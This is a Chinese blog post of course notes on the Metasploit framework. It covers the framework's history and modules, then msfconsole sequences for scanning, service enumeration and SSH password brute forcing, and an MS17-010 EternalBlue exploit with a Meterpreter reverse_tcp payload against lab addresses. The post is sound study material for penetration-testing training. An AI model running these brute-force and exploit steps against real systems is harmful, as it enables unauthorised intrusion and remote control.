鹽城網(wǎng)站推廣百度官方網(wǎng)站入口
引言:我的系列博客[網(wǎng)絡(luò)安全學(xué)習篇]上線了,小編也是初次創(chuàng)作博客,經(jīng)驗不足;對千峰網(wǎng)絡(luò)信息安全開源的視頻公開課程的學(xué)習整理的筆記整理的也比較粗糙,其實看到目錄有300多集的時候,講道理,有點慫了,所以我就想到了通過寫博客(課程筆記)的形式去學(xué)習它,雖然寫博客會讓我多花幾倍的時間去學(xué)習它,但是當我完成一篇博客所獲得的成就感和你們對于我的認同感,讓我很滿足,能夠鼓勵我一天天的堅持下去,也希望和我一起學(xué)習本期視頻的"同道"們也能給一直堅持下去。我們大家一起加油。由于作者本身也是網(wǎng)絡(luò)信息安全小白,大部分知識點都是初次接觸,出現(xiàn)對其理解不深入,不完整,甚至也會出現(xiàn)錯誤有問題的地方,希望大家諒解、留言提出指正,同時也歡迎大家來找我一起交流學(xué)習!!!
?
往期博客:
第一階段:
[網(wǎng)絡(luò)安全學(xué)習篇1]:windowsxp、windows2003、windows7、windows2008系統(tǒng)部署(千峰網(wǎng)絡(luò)安全視頻筆記)
[網(wǎng)絡(luò)安全學(xué)習篇24]:漏洞與木馬(千峰網(wǎng)絡(luò)安全視頻筆記 p117-p118)
第二階段:
[網(wǎng)絡(luò)安全學(xué)習篇25]:初識Linux及簡單命令
[網(wǎng)絡(luò)安全學(xué)習篇32]:Linux腳本編寫匯總及應(yīng)用
第三階段:
[網(wǎng)絡(luò)安全學(xué)習篇33]:0基礎(chǔ)帶你入門python
[網(wǎng)絡(luò)安全學(xué)習篇38]:基礎(chǔ)環(huán)境搭建
[網(wǎng)絡(luò)安全學(xué)習篇39]:HTML標簽基礎(chǔ) 常用的標簽 表格
[網(wǎng)絡(luò)安全學(xué)習篇42]:靶場環(huán)境搭建(ubuntu系統(tǒng)安裝優(yōu)化及vulhub安裝)
[網(wǎng)絡(luò)安全學(xué)習篇43]:PHP基礎(chǔ)+變量 運算符 流程控制語句
[網(wǎng)絡(luò)安全學(xué)習篇48]:JS 基礎(chǔ) 函數(shù) 事件)
第四階段:
[網(wǎng)絡(luò)安全學(xué)習篇49]:滲透測試方法論
[網(wǎng)絡(luò)安全學(xué)習篇50]:Web架構(gòu)安全分析
[網(wǎng)絡(luò)安全學(xué)習篇51]:信息收集
[網(wǎng)絡(luò)安全學(xué)習篇52]:掃描技術(shù)
[網(wǎng)絡(luò)安全學(xué)習篇53]:口令破解
[網(wǎng)絡(luò)安全學(xué)習篇54]:SQL注入
[網(wǎng)絡(luò)安全學(xué)習篇55]:SQL自動化注入
[網(wǎng)絡(luò)安全學(xué)習篇56]:XSS
[網(wǎng)絡(luò)安全學(xué)習篇57]:XSS(二)
[網(wǎng)絡(luò)安全學(xué)習篇58]:PHP代碼注入
[網(wǎng)絡(luò)安全學(xué)習篇59]:OS命令注入
[網(wǎng)絡(luò)安全學(xué)習篇60]:文件上傳
[網(wǎng)絡(luò)安全學(xué)習篇61]:文件包含
[網(wǎng)絡(luò)安全學(xué)習篇62]:CSRF 攻擊
[網(wǎng)絡(luò)安全學(xué)習篇63]:SSRF
[網(wǎng)絡(luò)安全學(xué)習篇64]:業(yè)務(wù)安全
[網(wǎng)絡(luò)安全學(xué)習篇65]:提權(quán)
[網(wǎng)絡(luò)安全學(xué)習篇66]:Metasploit(MSF)(本篇)
下期博文:
[網(wǎng)絡(luò)安全學(xué)習篇67]:python poc-exp
?
目錄
?
Metasploit 簡介
*誕生與發(fā)展
*技術(shù)架構(gòu)
@ 輔助模塊
@ 滲透攻擊模塊
@ 攻擊載荷
?
@ 空指令模塊
@ 編譯器模塊
@ 后滲透攻擊模塊
@ 免殺模塊
*為什么使用Metasploit ?
@ 情報搜集階段
@威脅建模階段
@ 漏洞分析階段
@后滲透攻擊階段
@ 報告生成階段
MSF
啟動MSF
MSF 的更新
基本命令
情報搜集
*網(wǎng)站敏感目錄掃描
*主機發(fā)現(xiàn)
*端口掃描
*探測服務(wù)詳細信息
*服務(wù)查點
@ telnet 服務(wù)查點
@ ssh服務(wù)查點
@ MSSL 服務(wù)查點
*口令猜測
@ ssh 服務(wù)口令猜解
@ MSSQL 服務(wù)口令猜解
網(wǎng)絡(luò)服務(wù)滲透攻擊
*MS17-010 “永恒之藍”
漏洞掃描
攻擊
*參數(shù)說明
Meterpreter
*常用基本命令
Metasploit 簡介
Metasploit 是一個開源的滲透測試軟件,也是一個逐步發(fā)展成熟的漏洞研究與滲透測試代碼開發(fā)平臺(可擴展),此外也將成為支持整個滲透測試的安全技術(shù)集成開發(fā)與應(yīng)用環(huán)境。
?
*誕生與發(fā)展
Metasploit 項目最初是由HD Moore 在2003年夏季創(chuàng)立的,目標是成為滲透測試攻擊研究與代碼開發(fā)的一個開發(fā)環(huán)境
HD Moore 在2003年 發(fā)布了他的第一個基于Perl 語言(pl)的Metasploit 版本,當時一共集成了11個滲透攻擊模塊
在Spoonm 的幫助下,完全重寫了Metasploit 的代碼,并在2004年發(fā)布了Metasploit v2.0, 版本中包含了18個滲透攻擊模塊和27個攻擊載荷(payload),并提供了控制臺終端,命令行和Web 三個使用接口
2004年 8月,HD 和Spoonm 帶著最新發(fā)布的Metasploit v2.2 并在拉斯維加斯舉辦的BlackHat 全球黑客大會上進行了演講。聽眾被Metasploit 的強大之處所折服,并一致認為:Metasploit 時代已經(jīng)到來。更多的黑客加入Matesploit 核心開發(fā)團隊與貢獻滲透攻擊、載荷與輔助模塊代碼。
2005 年的CanSecWest 黑客會議上,HD與Spoonm 指出Metasploit v2 體系框架中的一些難以解決的問題,包括:
@ 缺乏跨平臺支持,特別是不能很好的運行在Windows 系統(tǒng)上。
@ 很難支持自動化滲透攻擊過程
@ Perl 語言的復(fù)雜性和缺點使得外部貢獻者與用戶規(guī)模增長不相適應(yīng)
@ Perl 語言對一些復(fù)雜特性的支持能力較弱等
而且V2 版本是完全圍繞著滲透攻擊而設(shè)計的,對信息搜集與后滲透攻擊階段無法提供有效的支持。經(jīng)過18 個月的時間,Metasploit 團隊使用Ruby 語言完全重寫了Metasploit ,并在2007年發(fā)布v3.0 版本,其中包含177 個滲透攻擊模塊、104 個攻擊載荷以及30 個新引入的輔助模塊。
2009年 Metasploit 項目被一家滲透測試技術(shù)領(lǐng)域知名安全公司Rapid7 收購,隨后退出Metasploit Express 和Pro 商業(yè)版本。
2011年 Metasploit v4.0 發(fā)布,v4.0 版本在滲透攻擊、攻擊載荷與輔助模塊的數(shù)量上都有顯著的擴展,此外還引入了一種新的模塊類型--后滲透攻擊模塊,以支持滲透攻擊環(huán)節(jié)中進行敏感信息搜集、內(nèi)網(wǎng)拓展等一系列的攻擊測試。
2019年 Metasploit v5.0 發(fā)布,其使用了新的數(shù)據(jù)庫,并提供了一種新的數(shù)據(jù)服務(wù)。新版本引入了新的規(guī)避機制(evasion capabilities),支持多種語言,框架建立在不斷增加的世界級攻擊性內(nèi)容庫的框架基礎(chǔ)上。另外,此次更新還包括可用性改進和大規(guī)模開發(fā)的支持、數(shù)據(jù)庫和自動化API 的改進等
*技術(shù)架構(gòu)
@ 輔助模塊
Metasploit 為滲透測試的信息搜集環(huán)節(jié)提供了大量的輔助模塊支持,包括針對各種網(wǎng)絡(luò)服務(wù)的掃描與查點、構(gòu)建虛假服務(wù)收集登錄密碼、口令猜測破解、敏感信息泄露、Fuzz 測試發(fā)掘漏洞、實施網(wǎng)絡(luò)協(xié)議欺騙等模塊。
輔助模塊能夠幫助滲透測試攻擊者在滲透攻擊之前取得目標系統(tǒng)豐富的情報信息
?
@ 滲透攻擊模塊
滲透攻擊模塊是利用發(fā)現(xiàn)的安全漏洞或配置弱點對目標系統(tǒng)進行攻擊,以植入和運行攻擊載荷,從而獲取對遠程目標系統(tǒng)訪問權(quán)的代碼組件。
主動滲透攻擊所利用的安全漏洞位于網(wǎng)絡(luò)服務(wù)端與服務(wù)承載的上傳應(yīng)用程序中,由于這些服務(wù)通過是在主機上開啟一些監(jiān)聽端口等待客戶端連接,因此針對它們的滲透測試攻擊可以主動發(fā)起,通過連接目標系通網(wǎng)絡(luò)服務(wù),注入一些特殊構(gòu)造的包含“邪惡”的攻擊數(shù)據(jù)的網(wǎng)路請求內(nèi)容,觸發(fā)俺去那漏洞,并設(shè)定遠程服務(wù)進程執(zhí)行在“邪惡”數(shù)據(jù)中包含的攻擊載荷,從而獲取目標系統(tǒng)的控制會話。
被動滲透攻擊利用的漏洞為于客戶端軟件中,如瀏覽器、瀏覽器插件、點擊郵件客戶端、Office與Adobe 等各種文檔閱讀與編輯軟件。對于這類存在于客戶端軟件的安全漏洞,我們無法主動的將數(shù)據(jù)從遠程輸入到客戶端軟件中,因此只能采用被動滲透攻擊的方式,即構(gòu)造出“邪惡”的網(wǎng)頁、電子郵件或文檔文件,并通過架設(shè)包含此類惡意內(nèi)容的服務(wù)、發(fā)送郵件附件、結(jié)合社會工程學(xué)分發(fā)并誘騙目標用戶打開、結(jié)合網(wǎng)路欺騙和劫持技術(shù)等發(fā)式,等目標系統(tǒng)上的用戶訪問到這些“邪惡”的內(nèi)容,從而觸發(fā)客戶端軟件中的安全漏洞,給出控制目標系統(tǒng)的Shell 會話。
?
@ 攻擊載荷
攻擊載荷是在滲透測試攻擊成功后使目標系統(tǒng)運行的一段植入代碼,通常作用是為滲透攻擊者打開在目標系統(tǒng)上的控制會話連接
?
@ 空指令模塊
空指令(NOP)是對一些程序運行狀態(tài)不會造成任何實質(zhì)影響的空操作或者無關(guān)操作指令,最典型的空指令就是空操作,在x86 CPU 體系架構(gòu)平臺上的操作碼是0x90
?
@ 編譯器模塊
攻擊載荷模塊于空指令模塊組裝完成一個指令序列后,在這段指令被滲透攻擊模塊加入“邪惡”數(shù)據(jù)緩沖區(qū)交由目標系統(tǒng)運行之前,Metasploit 框架還需要完成一道非常重要的工序--編碼
編譯器模塊的第一個使命就是確保攻擊載荷中不會出現(xiàn)滲透攻擊過程中應(yīng)加以避免的“壞字符”。
第二個使命就是對攻擊載荷進行”免殺“處理。
?
@ 后滲透攻擊模塊
后滲透攻擊模塊主要支持在滲透攻擊取得目標系統(tǒng)控制權(quán)之后,在受控系統(tǒng)中進行各式各樣的后滲透攻擊動作,比如獲取敏感信息、進一步拓展、實施跳板攻擊等
?
@ 免殺模塊
對攻擊載荷進行“免殺”處理。
?
*為什么使用Metasploit ?
滲透攻擊是目前Metasploit 最強大和最具吸引力的核心功能,Metasploit 框架中集成了數(shù)百個針對主流操作系統(tǒng)平臺上 不同網(wǎng)路服務(wù)于應(yīng)用軟件安全漏洞的滲透攻擊模塊,可以由用戶在滲透攻擊場景中根據(jù)漏洞掃描結(jié)果進行選擇,并能夠自由裝配該平臺上適用的具有指定功能的攻擊載荷,然后通過自動化編碼機制繞過攻擊限制與檢測,對目標系統(tǒng)實施遠程攻擊。獲取系統(tǒng)的訪問控制權(quán)。
除了滲透攻擊之外,Metasploit 在發(fā)展過程中逐漸增加了對滲透測試全過程的支持,包括情報搜集、威脅建模、漏洞分析、后滲透攻擊與報告生成。
?
@ 情報搜集階段
Metasploit 一方面通過內(nèi)建的一系列掃描器與查點輔助模塊來獲取遠程服務(wù)器信息,另一方面通過插件機制集成調(diào)用Nmap、Nessus、OpenVAS 等著名業(yè)界的開源網(wǎng)路掃描工具,從而具備全面的信息搜集能力,為滲透攻擊實施提供必不可缺德精確情報。
?
@威脅建模階段
在搜集信息之后,Metasploit 支持一系列數(shù)據(jù)庫命令操作直接將這些信息匯總至PostgreSQL、MYSQL、SQLite數(shù)據(jù)庫中,并為用戶提供易用的數(shù)據(jù)庫查詢命令,可以幫助滲透測試者對目標系統(tǒng)搜到的情報進行威脅建模,從中找出可行的攻擊路徑
?
@ 漏洞分析階段
除了信息搜集環(huán)節(jié)能夠直接掃描出一些已公布德安全漏洞之外,Metassploit 中還提供了大量德協(xié)議Fuzz 測試器與Web 應(yīng)用漏洞探測分析模塊,支持具有一定水平能力德滲透測試者在實際過程中嘗試挖掘出0day 漏洞,并對漏洞機理與利用方法進行深入分析,而這將為滲透攻擊目標帶來更大的殺傷力,并提升滲透測試流程的技術(shù)含金量。
?
@后滲透攻擊階段
在成功實施滲透攻擊并獲取目標系統(tǒng)的遠程控制權(quán)之后,Metasploit 框架中另一個極具威名的工具Meterpreter 在后滲透攻擊階段提供了強大的功能。
Meterpreter 可以看作一個支持多操作系統(tǒng)平臺,可以 僅僅駐留于內(nèi)存中并具備免殺能力的高級后門工具,Meterpreter 中實現(xiàn)了特權(quán)提升、信息抓取、系統(tǒng)監(jiān)控、跳板攻擊與內(nèi)網(wǎng)拓展等多樣化的功能特性,此外還支持一種靈活可擴展的方式來加載額外的功能的后滲透攻擊模塊
?
@ 報告生成階段
Metssploit 框架獲得的滲透測試結(jié)果可以輸入至內(nèi)置數(shù)據(jù)庫中,因此這些結(jié)果可以通過數(shù)據(jù)庫查詢來獲取,并輔助滲透測試報告的寫作。
商業(yè)版(pro)具備了更強大的報告生成功能,可以輸出HTML、XML、Word 和PDF格式的報告。
?
MSF
啟動MSF
[msfconsole]
MSF 的安裝目錄:
[/usr/share/metasploit-framework/]
MSF 的更新
[apt-get update]??? #更新索引
[apt-get install metasploit-framework]
一個模塊就是一個rb 腳本
?
基本命令
--------------
info 查看模塊的詳細信息
set
show options
exploit
back?? 返回主目錄
exit?? 退出
-------------
?
情報搜集
*網(wǎng)站敏感目錄掃描
可以借助Metasploit 中的brute_dirs、dir_listing、dir_scanner 等輔助模塊來進行敏感目錄掃描。
他們主要使用暴力猜解的方式工作,主要此處需要提供一個目錄字典。
---------------
msf5 > use auxiliary/scanner/http/dir_scanner
msf5 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf5 auxiliary(scanner/http/dir_scanner) > set PATH /cms/
PATH => /cms/
msf5 auxiliary(scanner/http/dir_scanner) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/http/dir_scanner) > exploit
--------------
dir_scanner 模塊可以發(fā)現(xiàn)網(wǎng)站上的一些目錄,Admin、admin、images。只要字典足夠強大,可以找到更多的敏感目錄。
?
*主機發(fā)現(xiàn)
Metasploit 中提供了一些輔助模塊可用于主機的發(fā)現(xiàn),這些模塊位于
modules/auxiliary/scanner/discovery/目錄下
auxiliary/scanner/discovery/arp_sweep
auxiliary/scanner/discovery/empty_udp
auxiliary/scanner/discovery/ipv6_multicast_ping
auxiliary/scanner/discovery/ipv6_neighbor
auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
auxiliary/scanner/discovery/udp_probe
auxiliary/scanner/discovery/udp_sweep
可以使用arp_sweep 來枚舉本地局域網(wǎng)中的所有活躍主機
-------------------------
msf5 > use auxiliary/scanner/discovery/arp_sweep
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.2/24
RHOSTS => 192.168.1.2/24
msf5 auxiliary(scanner/discovery/arp_sweep) > set ThREADS 50
ThREADS => 50
msf5 auxiliary(scanner/discovery/arp_sweep) > exploit
------------------------
?
*端口掃描
Metasploit 的輔助模塊中提供了幾款實用的端口掃描器
auxiliary/scanner/portscan/ack
auxiliary/scanner/portscan/syn
auxiliary/scanner/portscan/xmas
auxiliary/scanner/portscan/ftpbounce
auxiliary/scanner/portscan/tc
一般情況下推薦使用syn 端口掃描器,因為他速度快,結(jié)果比較準確不易被對方察覺
-------------
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf5 auxiliary(scanner/portscan/syn) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/portscan/syn) > exploit
---------------
?
*探測服務(wù)詳細信息
在Metasploit 中使用一些插件可以調(diào)用系統(tǒng)中的命令,比如可以使用Nmap 探測目標的詳細服務(wù)信息,命令
[nmap -sS -Pn 192.168.1.200 -sV],參數(shù)說明:
-sS 使用SYN 半連接掃描
-Pn 早掃描之前,不發(fā)生ICME echo 請求測試目標是否活躍
-sV 探測服務(wù)詳細版本
?
*服務(wù)查點
在Metassploit 的輔助模塊中,有很多用于服務(wù)掃描和查點的工具,這些工具通常以[service_name]_version 命名。該模塊可用于遍歷網(wǎng)絡(luò)中包含的某種服務(wù)的主機,并進一步確定服務(wù)版本。
@ telnet 服務(wù)查點
telnet 是一個先天缺乏安全性的網(wǎng)絡(luò)服務(wù)。由于Telnet 沒有對傳輸?shù)臄?shù)據(jù)進行加密,越來越多的管理員漸漸使用更為安全的SSH 協(xié)議代替它 。盡管如此,很多價格昂貴、使用壽命長的大型交換機使用Telnet 協(xié)議的可能性更大,而此類交換機在網(wǎng)絡(luò)中的位置一般來說非常重要??梢允褂胻elnet_version 模塊掃描一下是否有主機或設(shè)備開啟了Telnet 服務(wù)
---------------
msf5 > use auxiliary/scanner/telnet/telnet_version
msf5 auxiliary(scanner/telnet/telnet_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/telnet/telnet_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/telnet/telnet_version) > exploit
----------------
?
@ ssh服務(wù)查點
通常管理員會使用SSH 對服務(wù)器進行遠程管理,服務(wù)器會向SSH 客戶端返回一個遠程Shell 連接。如果沒有做其他的安全增強配置,只要獲取服務(wù)的登錄口令,就可以使用SSH 客戶端登錄服務(wù)器,那就相當于獲取了登錄用的所有權(quán)限。
可以使用ssh_version 模塊遍歷網(wǎng)絡(luò)中開啟的SSH 服務(wù)的主機
-------------
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/ssh/ssh_version) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_version) > exploit
---------------
?
@ MSSL 服務(wù)查點
可以使用mysql_ping 查找網(wǎng)絡(luò)模塊中的Microsoft SQL Server
---------------
msf5 > use auxiliary/scanner/mssql/mssql_ping
msf5 auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/mssql/mssql_ping) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/mssql/mssql_ping) > exploit
---------------
?
*口令猜測
@ ssh 服務(wù)口令猜解
----------------
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/msf/user.dic
USER_FILE => /root/msf/user.dic???????????????
msf5 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/msf/pass.dic
PASS_FILE => /root/msf/pass.dic
msf5 auxiliary(scanner/ssh/ssh_login) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.150
RHOSTS => 192.168.1.150
msf5 auxiliary(scanner/ssh/ssh_login) > exploit
-----------------
?
@ MSSQL 服務(wù)口令猜解
scanner/mssql/mssql_login
…
?
網(wǎng)絡(luò)服務(wù)滲透攻擊
*MS17-010 “永恒之藍”
漏洞掃描
---------------
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.200/24
RHOSTS => 192.168.1.200/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
-----------------
攻擊
------------------
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.200
RHOSTS => 192.168.1.200
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.150
LHOST => 192.168.1.150
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
----------------
?
*參數(shù)說明
-p
--payload
<payload>
指定需要使用的payload (攻擊載荷)
-f
--format
<format>
指定輸出格式
-l
--list
<module_type>
列出指定模塊的所有資源
-n
--nopsled
<length>
為payload 預(yù)先指定一個NOP 滑動長度
-e
--encoder
[encoder]
指定需要使用的encoder(編碼器)
?
-a
--arch
<architecture>
指定payload 的目標架構(gòu)
Meterpreter
*常用基本命令
命令 | 解釋 |
background | 將Meterpreter 終端隱藏在后臺 |
sessions | 查看已經(jīng)成功獲取的會話。-i 選項,切入后臺會話 |
shell | 獲取系統(tǒng)的控制臺shell |
quit | 關(guān)閉當前的額Meterpreter 會話,返回MSF 終端 |
pwd | 獲取目標主機當前的工作目錄 |
cd | 切換目錄 |
ls | 查看當前目錄下的內(nèi)容 |
cat | 查看文件內(nèi)容 |
edit | 編輯文件 |
download | 下載文件 |
search | 搜索文件 |
ifconfig/ipconfig | 查看網(wǎng)卡信息 |
route | 查看路由信息,設(shè)置路由 |
sysinfo | 查看系統(tǒng)信息 |
getuid | 獲取當前用戶id |
ps | 查看進程 |
getpid | 查看當前進程 |
migrate | 切換進程 |
execute | 執(zhí)行文件 |
kill | 終極指定PID 的進程 |
shutdown | 關(guān)機 |
screenshot | 屏幕快照 |
參考文獻:
千峰網(wǎng)絡(luò)信息安全開源課程
?
?
?